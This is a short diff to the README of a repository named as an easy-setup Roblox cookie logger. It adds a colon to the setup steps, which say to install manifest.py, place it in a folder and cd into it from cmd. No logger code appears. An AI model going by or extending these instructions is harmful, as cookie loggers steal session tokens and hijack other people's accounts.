ct1n1/Roblox-Cookie-Logger-Easy-Set-up-/README.md

 1. Install the manifest.py file
 2. Create a new folder, and place it inside.
-3. Open cmd and type
+3. Open cmd and type:
    ```
    cd (path of your folder)
    ```